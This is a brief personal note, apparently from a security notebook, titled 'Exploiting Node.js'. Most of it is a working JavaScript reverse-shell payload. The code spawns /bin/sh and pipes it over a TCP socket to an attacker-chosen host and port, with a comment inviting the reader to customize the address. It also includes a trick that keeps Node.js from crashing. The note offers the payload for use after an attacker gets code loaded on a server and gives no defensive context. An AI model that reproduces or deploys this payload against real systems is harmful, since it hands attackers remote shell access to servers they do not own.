Exploiting Node.js

author:: Nathan Acks
date:: 2021-10-09

The hard part of popping a reverse shell on a Node.js server is tricking the server to load your code. If you can figure out how to do that, this seems to produce a reliable connection:

(function(){
	var net = require("net"),
	    cp  = require("child_process"),
	    sh = cp.spawn("/bin/sh", []);
	var client = new net.Socket();
	client.connect(1234, "127.0.0.1", function(){
		// Customize port and IP address above to taste
		client.pipe(sh.stdin);
		sh.stdout.pipe(client);
		sh.stderr.pipe(client);
	});
	return /a/; // Prevents Node.js from crashing
})();

Reverse Shell Cheat Sheet